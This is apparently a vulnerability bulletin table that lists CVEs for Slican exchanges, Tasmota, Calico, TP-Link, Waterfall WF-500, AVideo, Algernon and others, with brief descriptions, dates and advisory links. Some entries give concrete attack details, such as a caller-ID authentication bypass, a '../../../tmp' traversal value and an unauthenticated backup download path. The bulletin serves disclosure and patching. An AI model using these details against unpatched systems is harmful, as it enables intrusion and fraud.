| Slican--CCT-1668 | Slican telephone exchanges allow the control panel to be managed remotely. An unauthenticated attacker can connect to the modem from a telephone presenting a specific caller ID. This bypasses admin authentication and grants full access to the service protocol and configuration panel. The vulnerability is independent of the exchange's configuration: if remote access is disabled, calling with this caller ID temporarily enables it. This issue was fixed in the following versions: - IPL-256: version 6.61.0040 - IPM-032: version 6.61.0040 - CCT-1668: version 6.56.0430 - MAC-6400: version 6.56.0430 - CXS-0424: version 6.30.0510 The issue STILL EXISTS in End-Of-Life telephone exchanges running versions 4.xx and below: - CCT-1668 (CCT1CPU) - MAC-6400 - CXS-0424 These products were discontinued in 2011 and 2012 and will not receive updates; they require a hardware update before a software update can be applied. The vendor recommends that users of these devices contact its service department directly to determine upgrade options. | 2026-05-27 | not yet calculated | CVE-2026-35090 | https://cert.pl/posts/2026/05/CVE-2026-35087 |
| Slican--IPx | Slican telephone exchanges allow administrative protocol authentication bypass. An attacker can bypass the login credential check by issuing the appropriate command. This issue was fixed in the following versions: - NCP: version 1.24.0250 - IPx series: version 6.61.0040 - CCT-1668: version 6.56.0430 - MAC-6400: version 6.56.0430 - CXS-0424: version 6.30.0510 The issue STILL EXISTS in End-Of-Life telephone exchanges running versions 4.xx and below: - CCT-1668 (CCT1CPU) - MAC-6400 - CXS-0424 These products were discontinued in 2011 and 2012 and will not receive updates; they require a hardware update before a software update can be applied. The vendor recommends that users of these devices contact its service department directly to determine upgrade options. | 2026-05-27 | not yet calculated | CVE-2026-35087 | https://cert.pl/posts/2026/05/CVE-2026-35087 |
| Slican--IPx | In Slican telephone exchanges the secure key is generated predictably from properties of the exchange that can be obtained without authentication. An unauthenticated attacker can deduce the secure key and obtain admin credentials. This issue was fixed in the following versions: - IPx series: version 6.61.0040 - CCT-1668: version 6.56.0430 - MAC-6400: version 6.56.0430 - CXS-0424: version 6.30.0510 The issue STILL EXISTS in End-Of-Life telephone exchanges running versions 4.xx and below: - CCT-1668 (CCT1CPU) - MAC-6400 - CXS-0424 These products were discontinued in 2011 and 2012 and will not receive updates; they require a hardware update before a software update can be applied. The vendor recommends that users of these devices contact its service department directly to determine upgrade options. | 2026-05-27 | not yet calculated | CVE-2026-35089 | https://cert.pl/posts/2026/05/CVE-2026-35087 |
| SMSGate--Sms-Core | An issue in SMSGate sms-core <= 2.1.13.6 allows a remote attacker to execute arbitrary code via deserialization in the Cmpp7FDeliverRequestMessageCodec.java component. | 2026-05-28 | not yet calculated | CVE-2026-37579 | https://github.com/wudijun/jun.github.io/blob/main/SMSGate%20deserialization%20vulnerability.md |
| SourceBans--Material Admin | An issue in SourceBans Material Admin before v.1.1.6 (3ecd95e) allows attackers to manipulate arbitrary user data in the web app via a crafted XAJAX call. | 2026-05-28 | not yet calculated | CVE-2026-30760 | https://gist.github.com/ng-dst/ca6663a4107fd39eaba1be2cb1d52b51 https://github.com/SB-MaterialAdmin/Web https://github.com/SB-MaterialAdmin/Web/issues/374 https://gist.github.com/ng-dst/450b698433f628990921f1e5ab46ff8c |
| SourceBans--Material Admin | An arbitrary file upload vulnerability in the pages/admin.uploadmapimg.php component of SourceBans Material Admin v1.1.6 allows attackers to execute arbitrary code via uploading a crafted image file. | 2026-05-28 | not yet calculated | CVE-2026-30761 | https://gist.github.com/ng-dst/ca6663a4107fd39eaba1be2cb1d52b51 https://github.com/SB-MaterialAdmin/Web https://github.com/SB-MaterialAdmin/Web/issues/374 https://gist.github.com/ng-dst/254163056c2d8a2f55259dcb79531b31 |
| SourceCodester--Doctor Appointment System 1.0 | SourceCodester Doctor Appointment System 1.0 is vulnerable to Cross Site Scripting (XSS) due to improper handling of user supplied input in the user registration functionality in register.php. | 2026-05-29 | not yet calculated | CVE-2026-36324 | https://www.sourcecodester.com/php/18453/doctor-appointment-system-using-php-and-mysql-source-code.html https://github.com/adhiyaksactf/MyCVE-Disclosures/blob/main/rems-DoctorAppointmentSystem/CVE-2026-36324/README.md |
| SpSoft--AppLock | SpSoft AppLock (com.sp.protector.free) 7.9.40 for Android allows a local attacker with physical access to bypass fingerprint or PIN authentication. Although the app integrates Android's biometric mechanisms, the lock is implemented as a custom overlay that does not consistently enforce authentication. By navigating cascading interface flows (exposed routes reached via advertisement or browser intents), an attacker can exit the lock interface without re-authenticating and access protected apps (e.g., Chrome). This results in information disclosure and privilege escalation. | 2026-05-27 | not yet calculated | CVE-2025-68712 | https://play.google.com/store/apps/details?id=com.sp.protector.free https://github.com/actuator/com.sp.protector.free https://github.com/actuator/com.sp.protector.free/blob/main/CVE-2025-68712 |
| StrongDM--StrongDM Desktop Application | StrongDM Desktop Application before 23.74.0 (Desktop Client before 53.77.0) on Microsoft Windows stores authentication state, including a JSON Web Token and asymmetric key material, in cleartext in a per-user state file located at C:\Users\<username>\.sdm\state.kv. The file is protected only by default user-level NTFS permissions. Exploitation requires local read access to the affected user's profile directory and additional deployment and execution conditions on the target host. The condition was reported through coordinated disclosure by Hope Walker (SpecterOps). | 2026-05-29 | not yet calculated | CVE-2026-4387 | StrongDM Security Advisory |
| Suprema--BioStar 2 (server) | Incorrect permission settings on a critical resource in Suprema BioStar 2 (versions 2.9.3 through 2.9.11) allow backup files to be publicly exposed when the administrator configures their path within the NGINX webroot. An attacker with network access can directly download backup ZIP files via 'http(s)://[server]/download/…' without authentication. This exposes highly sensitive information that can lead to server impersonation, unauthorized database access, and lateral movement. | 2026-05-29 | not yet calculated | CVE-2026-9508 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-supremas-biostar |
| Suprema--BioStar 2 (server) | An unhandled exception in Suprema BioStar 2 (Server), versions 2.9.8, 2.9.10, and 2.9.11, allows an unauthenticated remote attacker to cause a denial of service (DoS) by sending HTTP POST requests to the '/api/migration' endpoint. The request triggers a failure that halts critical processes, leaving the system offline until the services or server are manually restarted. As a result, access control readers stop functioning, and third-party integrations may fail. Since the exploit requires no privileges or user interaction and is trivial to automate, the impact on availability is high, and the effect extends to interconnected systems. | 2026-05-29 | not yet calculated | CVE-2026-9509 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-supremas-biostar |
| Tasmota--Tasmota | Buffer Overflow vulnerability in arendst Tasmota v.15.3.0.3 and before allows a remote attacker to execute arbitrary code via the tasmota/tasmota_xdrv_driver/xdrv_10_scripter.ino, fetch_jpg() function. | 2026-05-27 | not yet calculated | CVE-2026-38422 | https://github.com/arendst/Tasmota https://github.com/arendst/Tasmota/blob/development/tasmota/tasmota_xdrv_driver/xdrv_10_scripter.ino https://github.com/sermikr0/CVE-2026-38422 |
| Tasmota--Tasmota | Buffer Overflow vulnerability in arendst Tasmota v.15.3.0.3 and before allows a remote attacker to execute arbitrary code via an unbounded strcpy() into the 40-byte jpg_task.boundary buffer in fetch_jpg() in xdrv_10_scripter.ino. | 2026-05-27 | not yet calculated | CVE-2026-38426 | https://github.com/arendst/Tasmota/blob/c207cc2/tasmota/tasmota_xdrv_driver/xdrv_10_scripter.ino https://github.com/sermikr0/CVE-2026-38426 |
| Tasmota--Tasmota | An issue in fetch_jpg() in xdrv_10_scripter.ino in Tasmota through 15.3.0.3 allows a remote attacker to cause heap buffer overflow. The Content-Length from a JPEG stream is stored in a uint16_t variable; values above 65535 wrap around, causing allocation of a smaller buffer than the data actually read. | 2026-05-27 | not yet calculated | CVE-2026-38427 | https://github.com/arendst/Tasmota/blob/c207cc2/tasmota/tasmota_xdrv_driver/xdrv_10_scripter.ino https://github.com/sermikr0/CVE-2026-38427 |
| tassos.gr--Novarain/Tassos Framework (plg_system_nrframework) | The vulnerability in the Tassos Framework Plugin allows users to delete arbitrary files on the affected sites. | 2026-05-27 | not yet calculated | CVE-2026-48906 | https://tassos.gr |
| tauri-apps--tauri | Tauri is a framework for building binaries for all major desktop platforms. From 2.0 to 2.11.0, a flaw in Tauri's is_local_url() function causes it to incorrectly classify remote URLs as trusted local origins on Windows and Android. On these platforms, Tauri maps custom URI scheme protocols to http://<scheme>.localhost/ because their WebView implementations cannot serve custom URI schemes directly. Tauri's check for whether an origin is local only inspects the first subdomain label of the URL's host. An attacker can abuse this by hosting a page on a domain whose first subdomain label matches the application's custom scheme. This vulnerability is fixed in 2.10.3. | 2026-05-27 | not yet calculated | CVE-2026-42184 | https://github.com/tauri-apps/tauri/security/advisories/GHSA-7gmj-67g7-phm9 |
| th30d4y--OpenLearnX | OpenLearnX is an open-source, decentralized learning and assessment platform. Prior to 2.0.4, a critical authentication vulnerability was identified in OpenLearnX that could allow unauthorized access to user accounts under specific conditions. This vulnerability is fixed in 2.0.4. | 2026-05-27 | not yet calculated | CVE-2026-44720 | https://github.com/th30d4y/OpenLearnX/security/advisories/GHSA-223g-f5mq-gw33 |
| Tigera--Calico | In Calico, the install-cni init container logs the rendered CNI configuration to standard output. When the configuration template uses the __SERVICEACCOUNT_TOKEN__ placeholder (Canal/Flannel-Calico deployments), the installer substitutes the live Kubernetes ServiceAccount bearer token before logging, exposing the token to any authenticated user with pods/log permission in the namespace where calico-node runs. The token holds patch privileges on pods/status, enabling annotation-based attacks against cluster workloads. The default kubeconfig-based authentication path is not affected. This is a direct regression of TTA-2018-001. | 2026-05-28 | not yet calculated | CVE-2026-41184 | https://github.com/projectcalico/calico/pull/12502 https://github.com/projectcalico/calico/pull/12527 https://github.com/projectcalico/calico/pull/12526 https://www.tigera.io/security-bulletins/tta-2026-001/ |
| Tigera--Calico | When Calico is configured with the Azure IPAM plugin, the Calico CNI binary mutates the incoming CNI configuration to attach subnet information before delegating to the IPAM plugin. After mutating, the Azure IPAM helper logs the entire unmarshaled configuration map (stdinData) at INFO level to /var/log/calico/cni/cni.log on every CNI ADD and DEL invocation - once per pod scheduled or terminated on the node. When the cluster is deployed using token-based Kubernetes authentication, this log entry contains the ServiceAccount token, client key, and certificate authority in plaintext. Any principal with read access to /var/log/calico/cni/cni.log on a node can read these logs and extract the credentials, which grant cluster-wide Calico networking admin privileges. | 2026-05-28 | not yet calculated | CVE-2026-41185 | https://github.com/projectcalico/calico/pull/12502 https://github.com/projectcalico/calico/pull/12527 https://github.com/projectcalico/calico/pull/12526 https://www.tigera.io/security-bulletins/tta-2026-002/ |
| Tigera--Calico | When calicoctl is invoked with --log-level=info or --log-level=debug, the client prints the full contents of its loaded connection-configuration struct to stderr in a single log line. The struct embeds every credential calicoctl uses to talk to the cluster - inline kubeconfig (with bearer token), Kubernetes API bearer token, etcd password, and inline PEM-encoded etcd client certificate and key. Any reader of that stderr stream - CI job logs, session-recording archives, shared support-ticket transcripts, or local filesystem viewers on the host that ran calicoctl - can extract these credentials with zero Kubernetes privilege. calicoctl's default log level is panic, so this issue only triggers when verbose logging is explicitly enabled. | 2026-05-28 | not yet calculated | CVE-2026-6720 | https://github.com/projectcalico/calico/pull/12535 https://github.com/projectcalico/calico/pull/12536 https://github.com/projectcalico/calico/pull/12537 https://www.tigera.io/security-bulletins/tta-2026-003/ |
| TP-Link Systems Inc.--Archer BE7200 V1 | An authenticated command injection vulnerability exists in the Archer BE450 v1 and BE7200 v1 routers that allows an administrator to execute arbitrary system commands through the web management interface. After authenticating to the admin interface, an attacker can use the browser's developer console to supply crafted input that is passed to backend system commands without adequate sanitization. Successful exploitation enables execution of arbitrary commands with elevated privileges on the device, which may allow the attacker to start unauthorized services, modify system configuration, or otherwise fully compromise the router's operating environment. | 2026-05-27 | not yet calculated | CVE-2026-5509 | https://www.tp-link.com/en/support/download/archer-be450/#Firmware https://www.tp-link.com/jp/support/download/archer-be450/#Firmware https://www.tp-link.com/jp/support/download/archer-be7200/#Firmware https://www.tp-link.com/us/support/faq/5102/ |
| TP-Link Systems Inc.--Archer C64 v1.0 | Due to improper enforcement of authentication rate-limiting on a debug SSH service in Archer C64 v1, the SSH service allows unlimited authentication attempts and uses the same credentials as the web interface. This enables an attacker to brute-force valid credentials via SSH. Successful exploitation could allow an attacker with adjacent network access to obtain administrative credentials through unrestricted authentication attempts and subsequently gain full administrative access to the device, impacting system confidentiality, integrity, and availability. | 2026-05-28 | not yet calculated | CVE-2026-8697 | https://www.tp-link.com/en/support/download/archer-c64/v1/#Firmware https://www.tp-link.com/us/support/faq/5105/ |
| TP-Link Systems Inc.--Tapo L535E v1.0, v3.0 | TP-Link has identified a vulnerability in Tapo L535E v1.0 and v3.0, Tapo P300 v1.0, and Tapo D100C v1.0, where Bluetooth communication during the initial setup phase is transmitted in cleartext without encryption. Bluetooth is only used during initialization. An attacker within Bluetooth range could exploit this behavior using Bluetooth sniffing or man-in-the-middle techniques to eavesdrop on Bluetooth communication, manipulate transmitted setup data, and potentially gain unauthorized control of the device during initialization. D100C is the chime bundled with the following Tapo camera products: D130, D210, D235, D225, TD21, TDB21 and TD25. | 2026-05-28 | not yet calculated | CVE-2026-34126 | https://www.tp-link.com/us/support/download/tapo-l535e/#Firmware-Release-Notes https://www.tp-link.com/en/support/download/tapo-l535e/v3/#Firmware-Release-Notes https://www.tp-link.com/jp/support/download/tapo-p300/#Firmware-Release-Notes https://www.tp-link.com/en/support/download/tapo-p300/#Firmware-Release-Notes https://www.tp-link.com/jp/support/download/tapo-l535e/#Firmware-Release-Notes https://www.tp-link.com/us/support/faq/5106/ |
| TP-Link Systems Inc.--TL-SG108PE v5 | A stored cross-site scripting (XSS) vulnerability has been identified in the web management interface of TP-Link's TL-SG108PE v5 switch due to improper sanitization of the SYSNAM configuration parameter during configuration file import. An attacker with administrator access can inject malicious script into the device configuration, which is stored and executed in the administrator's browser when the affected interface is viewed. Successful exploitation may allow session cookie theft, unauthorized configuration changes, or access to sensitive information exposed through the management interface. | 2026-05-29 | not yet calculated | CVE-2026-34127 | https://www.tp-link.com/en/support/download/tl-sg108pe/v5/#Firmware https://www.tp-link.com/us/support/download/tl-sg108pe/v5/#Firmware https://www.tp-link.com/us/support/faq/5110/ |
| traccar--traccar | Traccar is an open source GPS tracking system. Prior to 6.13.0, DeviceResource.uploadImage authorizes the target device only through Condition.Permission(User.class, getUserId(), Device.class) and then immediately streams the uploaded body into mediaManager.createFileStream(...). Unlike the generic mutation path in BaseObjectResource.update and the explicit device mutation handler updateAccumulators, this route never invokes permissionsService.checkEdit(getUserId(), Device.class, false, false). The skipped guard is exactly where Traccar enforces readonly and deviceReadonly restrictions for non-admin users. An unauthorized user can replace a device's stored image file under the server media directory. This allows modification of UI-visible device media and any downstream workflows that rely on the persisted image, despite other device update paths correctly rejecting the same identity. This vulnerability is fixed in 6.13.0. | 2026-05-26 | not yet calculated | CVE-2026-44314 | https://github.com/traccar/traccar/security/advisories/GHSA-33v4-5x2g-7mjm |
| TriliumNext--Trilium | Trilium Notes is a cross-platform, hierarchical note taking application focused on building large personal knowledge bases. Prior to 0.102.2, a malicious ZIP archive imported with safe import enabled achieves RCE via #docName path traversal and XSS by combining a payload note (type: code, mime: text/plain) containing raw HTML/JS and a trigger note (type: doc or type: launcher) with a #docName label that uses ../ path traversal to point at the payload note's API endpoint. The desktop client Electron renderer runs with nodeIntegration enabled, so an RCE is triggered once the payload is executed. This vulnerability is fixed in 0.102.2. | 2026-05-29 | not yet calculated | CVE-2026-45668 | https://github.com/TriliumNext/Trilium/security/advisories/GHSA-9jjc-cccq-f6rh |
| ultrajson--ultrajson | UltraJSON is a fast JSON encoder and decoder written in pure C with bindings for Python 3.7+. Prior to 5.12.1, when ujson.dump() writes to a file-like object and the write operation raises an exception, the reference count of the serialized JSON string object is not decremented, leaking memory. Each failed write leaks the full size of the serialized payload. This vulnerability is fixed in 5.12.1. | 2026-05-27 | not yet calculated | CVE-2026-44660 | https://github.com/ultrajson/ultrajson/security/advisories/GHSA-c38f-wx89-p2xg https://github.com/ultrajson/ultrajson/commit/82af1d0ac01d09aa40c887b460d44b9d9f4bccd9 https://github.com/ultrajson/ultrajson/releases/tag/5.12.1 |
| Unknown--Eupago Gateway For Woocommerce | The Eupago Gateway For Woocommerce WordPress plugin before 4.7.2 does not properly restrict access to its refund request handler, allowing unauthenticated attackers to initiate refunds against any WooCommerce order using the merchant's payment gateway credentials, and for applicable payment methods, to redirect refunded funds to an attacker-controlled bank account. | 2026-05-28 | not yet calculated | CVE-2026-7862 | https://wpscan.com/vulnerability/b4ce2a06-b435-4b77-851f-4406f2a91ca6/ |
| Unknown--EventPress | The EventPress WordPress theme before 22.2 does not sanitize or escape the 'id' parameter in the eventpress_customizer_notify_dismiss_action AJAX handler before outputting it back in the response, allowing unauthenticated attackers to perform Reflected Cross-Site Scripting attacks against logged-in users. | 2026-05-27 | not yet calculated | CVE-2026-6268 | https://wpscan.com/vulnerability/77192aeb-8e4b-4057-b5d7-2b95da634edd/ |
| uzy--ssm-mall--uzy-ssm-mall | SQL Injection vulnerability in uzy-ssm-mall v1.1.0 allows a remote attacker to obtain sensitive information via the ProductMapper.xml and /OrderUtil.java components | 2026-05-27 | not yet calculated | CVE-2026-38808 | https://github.com/cagexunxi/CVE/issues/3 |
| Veeam--Backup and Replication | This vulnerability in Veeam Agent for Microsoft Windows allows for Local Privilege Escalation. | 2026-05-28 | not yet calculated | CVE-2026-32996 | https://www.veeam.com/kb4852 |
| Veeam--Backup and Replication | A vulnerability allowing an authenticated user with the Backup Administrator role to write arbitrary files on a Linux-based Veeam Backup & Replication server. | 2026-05-28 | not yet calculated | CVE-2026-32997 | https://www.veeam.com/kb4852 |
| Veeam--Service Provider Console | This vulnerability in Veeam Service Provider Console allows for remote code execution. | 2026-05-28 | not yet calculated | CVE-2026-32998 | https://www.veeam.com/kb4853 |
| verbb--formie | Formie is a Craft CMS plugin for creating forms. Prior to 2.2.21 and 3.1.26, unauthenticated users could modify existing submissions by posting a known or guessed submission ID to formie/submissions/save-submission. This vulnerability is fixed in 2.2.21 and 3.1.26. | 2026-05-29 | not yet calculated | CVE-2026-47266 | https://github.com/verbb/formie/security/advisories/GHSA-pgxq-p76c-x9cg https://github.com/verbb/formie/releases/tag/2.2.21 https://github.com/verbb/formie/releases/tag/3.1.26 |
| View Concept--Kidsview | A user with physical access to a smartphone can bypass the authentication mechanism of the Kidsview mobile application and grant themselves full access to the device owner's account by interacting with the application's push notification. This issue was fixed in version 4.4.3. | 2026-05-28 | not yet calculated | CVE-2026-8990 | https://cert.pl/posts/2026/05/CVE-2026-8990 https://kidsview.pl/ |
| vllm-project--vllm-project/vllm | vllm-project/vllm version 0.14.1 contains a vulnerability where the `trust_remote_code=True` parameter is hardcoded in two model implementation files (`vllm/model_executor/models/nemotron_vl.py` and `vllm/model_executor/models/kimi_k25.py`). This bypasses the user's explicit `--trust-remote-code=False` setting, enabling remote code execution via malicious HuggingFace model repositories. This issue is an incomplete fix for CVE-2025-66448 and CVE-2026-22807, as it affects separate code paths in model implementation files. Deployments loading NemotronVL or KimiK25 models are particularly impacted. | 2026-05-28 | not yet calculated | CVE-2026-4944 | https://huntr.com/bounties/97f706f7-a852-49b2-a4eb-76811e611daf |
| Waterfall--WF-500 | Nozomi Networks Labs identified a CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in the Administration WebUI in Waterfall WF-500 TX Host in version 7.9.1.0 R2502171040 that allows remote authenticated attackers to execute arbitrary operating system commands on the WF-500 TX Host. | 2026-05-29 | not yet calculated | CVE-2025-41265 | https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2025-41265 |
| Waterfall--WF-500 | Nozomi Networks Labs identified a CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in the Administration WebUI in Waterfall WF-500 TX Host in version 7.9.1.0 R2502171040 that allows remote authenticated attackers to execute arbitrary operating system commands on the WF-500 TX Host. | 2026-05-29 | not yet calculated | CVE-2025-41266 | https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2025-41266 |
| Waterfall--WF-500 | Nozomi Networks Labs identified a CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in the Administration WebUI in Waterfall WF-500 TX Host in version 7.9.1.0 R2502171040 that allows remote authenticated attackers to execute arbitrary operating system commands on the WF-500 TX Host. | 2026-05-29 | not yet calculated | CVE-2025-41267 | https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2025-41267 |
| Waterfall--WF-500 | Nozomi Networks Labs identified a CWE-23: Relative Path Traversal in the Administration WebUI in Waterfall WF-500 TX and RX Hosts in version 7.9.1.0 R2502171040 that allows remote unauthenticated attackers to delete arbitrary files on the Host machines. | 2026-05-29 | not yet calculated | CVE-2025-41268 | https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2025-41268 |
| Waterfall--WF-500 | Nozomi Networks Labs identified a CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in the Console WebUI in Waterfall WF-500 TX and RX Hosts in version 7.9.1.0 R2502171040 that allows remote unauthenticated attackers to execute arbitrary operating system commands on the device. | 2026-05-29 | not yet calculated | CVE-2025-41269 | https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2025-41269 |
| Waterfall--WF-500 | Nozomi Networks Labs identified a CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in the Console WebUI in Waterfall WF-500 TX and RX Hosts in version 7.9.1.0 R2502171040 that allows remote unauthenticated attackers to execute arbitrary operating system commands on the device. | 2026-05-29 | not yet calculated | CVE-2025-41270 | https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2025-41270 |
| Waterfall--WF-500 | Nozomi Networks Labs identified a CWE-23: Relative Path Traversal in the Console WebUI in Waterfall WF-500 TX and RX Hosts in version 7.9.1.0 R2502171040 that allows remote unauthenticated attackers to read arbitrary files from the device. | 2026-05-29 | not yet calculated | CVE-2025-41271 | https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2025-41271 |
| Waterfall--WF-500 | Nozomi Networks Labs identified a CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in the Console WebUI in Waterfall WF-500 TX and RX Hosts in version 7.9.1.0 R2502171040 that allows remote unauthenticated attackers to execute arbitrary operating system commands on the device. | 2026-05-29 | not yet calculated | CVE-2025-41272 | https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2025-41272 |
| Waterfall--WF-500 | Nozomi Networks Labs identified a CWE-288: Authentication Bypass Using an Alternate Path or Channel in the Console WebUI in Waterfall WF-500 TX and RX Hosts in version 7.9.1.0 R2502171040 that allows remote unauthenticated attackers to bypass authentication of the Console web application and perform actions as an authenticated user. | 2026-05-29 | not yet calculated | CVE-2025-41273 | https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2025-41273 |
| Waterfall--WF-500 | Nozomi Networks Labs identified a CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in the Console WebUI in Waterfall WF-500 TX and RX Hosts in version 7.9.1.0 R2502171040 that allows remote unauthenticated attackers to execute arbitrary operating system commands on the device. | 2026-05-29 | not yet calculated | CVE-2025-41274 | https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2025-41274 |
| Waterfall--WF-500 | Nozomi Networks Labs identified a CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in the Console WebUI in Waterfall WF-500 TX and RX Hosts in version 7.9.1.0 R2502171040 that allows remote unauthenticated attackers to execute arbitrary operating system commands on the device. | 2026-05-29 | not yet calculated | CVE-2025-41275 | https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2025-41275 |
| Waterfall--WF-500 | Nozomi Networks Labs identified a CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in the Console WebUI in Waterfall WF-500 TX and RX Hosts in version 7.9.1.0 R2502171040 that allows remote unauthenticated attackers to execute arbitrary operating system commands on the device. | 2026-05-29 | not yet calculated | CVE-2025-41276 | https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2025-41276 |
| Waterfall--WF-500 | Nozomi Networks Labs identified a CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in the Console WebUI in Waterfall WF-500 TX and RX Hosts in version 7.9.1.0 R2502171040 that allows remote unauthenticated attackers to execute arbitrary operating system commands on the device. | 2026-05-29 | not yet calculated | CVE-2025-41277 | https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2025-41277 |
| Waterfall--WF-500 | Nozomi Networks Labs identified a CWE-125: Out-of-bounds Read in Waterfall WF-500 RX Host in version 7.10.0.0 R2601141040 that allows attackers with access to the TX Host to execute code on the RX Host. | 2026-05-29 | not yet calculated | CVE-2025-41278 | https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2025-41278 |
| Waterfall--WF-500 | Nozomi Networks Labs identified a CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in the Administration WebUI in Waterfall WF-500 RX Host in version 7.9.1.0 R2502171040 that allows remote authenticated attackers to execute arbitrary operating system commands on the WF-500 RX Host. | 2026-05-29 | not yet calculated | CVE-2025-41279 | https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2025-41279 |
| Waterfall--WF-500 | Nozomi Networks Labs identified a CWE-23: Relative Path Traversal (Zip Slip) in Waterfall WF-500 RX Host in version 7.9.1.0 R2502171040 that allows attackers with access to the TX Host to execute code on the RX Host when a MySQL connector is configured and file compression is enabled. | 2026-05-29 | not yet calculated | CVE-2025-41280 | https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2025-41280 |
| Waterfall--WF-500 | Nozomi Networks Labs identified a CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in Waterfall WF-500 RX Host in version 7.9.1.0 R2502171040 that allows attackers with access to the TX Host to execute code on the RX Host when a MySQL connector is configured. | 2026-05-29 | not yet calculated | CVE-2025-41281 | https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2025-41281 |
| Webmin--Webmin | Webmin before 2.640 does not safely construct a filename for saving of an attachment within the mailboxes component. This occurs in mailboxes/detachall.cgi. | 2026-05-27 | not yet calculated | CVE-2026-49103 | https://github.com/webmin/webmin/commit/cf432879a14568c4bb44cd2f9e5a9bd0e168edc1 https://github.com/webmin/webmin/compare/2.630...2.640 |
| WWBN--AVideo | WWBN AVideo is an open source video platform. In 29.0 and earlier, view/update.php reads $_POST['updateFile'] as a relative path under updatedb/ and passes it to PHP's file() for line-by-line execution as part of a database migration. An authenticated administrator can abuse this to read arbitrary text files reachable from the web-server process. | 2026-05-29 | not yet calculated | CVE-2026-45731 | https://github.com/WWBN/AVideo/security/advisories/GHSA-3mjv-375j-6h92 |
| WWBN--AVideo | WWBN AVideo is an open source video platform. In 29.0 and earlier, an unauthenticated remote attacker can read arbitrary image files anywhere on disk that the PHP user can open - including private user-profile photos that the application's normal serving wrappers gate behind ACLs, admin-uploaded thumbnails, encrypted-video poster frames, and image content under sibling-app directories reachable via .. traversal. The endpoint requires no authentication. | 2026-05-29 | not yet calculated | CVE-2026-46337 | https://github.com/WWBN/AVideo/security/advisories/GHSA-w4qq-74h6-58wq |
| WWBN--AVideo | WWBN AVideo is an open source video platform. In 29.0 and earlier, plugin/AuthorizeNet/processPayment.json.php credits the logged-in user's wallet based only on the attacker-controlled amount POST parameter. The endpoint contains a TODO for real Authorize.Net charging, hardcodes $paymentSuccess = true, and then calls YPTWallet::addBalance() without validating any Authorize.Net transaction, webhook signature, hosted payment token, nonce, or server-side payment record. This allows any logged-in user to add arbitrary funds to their own AVideo wallet when the AuthorizeNet and YPTWallet plugins are enabled. | 2026-05-29 | not yet calculated | CVE-2026-47696 | https://github.com/WWBN/AVideo/security/advisories/GHSA-9392-pj54-qqf8 |
| XCharge--C6 | A firmware update mechanism in the affected charging controller fails to validate the authenticity of firmware packages delivered through the device's management interface. Because cryptographic signatures are not verified, an attacker with the ability to interfere with or impersonate the management channel could cause the device to install an unauthorized firmware package. This condition could allow execution of unauthorized code with high privileges on the device. | 2026-05-28 | not yet calculated | CVE-2026-9037 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-148-08 |
| XCharge--C6 | A stack-based buffer overflow vulnerability in the charging controller's signal-processing logic allows an attacker with physical access to the charging interface to supply message fields that exceed expected bounds. Because the input is not sufficiently validated, memory corruption may occur, which can lead to execution of unauthorized code with elevated privileges. | 2026-05-28 | not yet calculated | CVE-2026-9038 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-148-08 |
| XCharge--C6 | A configuration weakness in the device's remote management service allows an authenticated session to be established over a communication channel intended solely for vehicle-charger signaling. The service is accessible on interfaces exposed through the charging connector, and it accepts a default administrative credential. A malicious device physically connected to the charging interface could leverage this misconfiguration to obtain full administrative access. | 2026-05-28 | not yet calculated | CVE-2026-9039 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-148-08 |
| xyproto--algernon | Algernon is a small self-contained pure-Go web server. Prior to 1.17.6, in engine/luahandler.go, the sync.RWMutex protecting LoadCommonFunctions is released before L.Push() and L.PCall() execute. Since gopher-lua's LState is explicitly not goroutine-safe, concurrent requests race on the shared state causing Lua VM corruption. The Go race detector confirms this immediately under modest concurrency (ab -n 1000 -c 100). This vulnerability is fixed in 1.17.6. | 2026-05-26 | not yet calculated | CVE-2026-43981 | https://github.com/xyproto/algernon/security/advisories/GHSA-rr2f-4wrm-h6rg https://github.com/xyproto/algernon/issues/172 |
| xyproto--algernon | Algernon is a small self-contained pure-Go web server. Prior to 1.17.6, uploadedFileSaveIn() in lua/upload/upload.go uses filepath.Join() with the caller-supplied directory but performs no boundary check after joining. A directory of ../../../tmp resolves cleanly to /tmp, outside the web root. This vulnerability is fixed in 1.17.6. | 2026-05-26 | not yet calculated | CVE-2026-43982 | https://github.com/xyproto/algernon/security/advisories/GHSA-2j2c-pv62-mmcp https://github.com/xyproto/algernon/issues/172 |
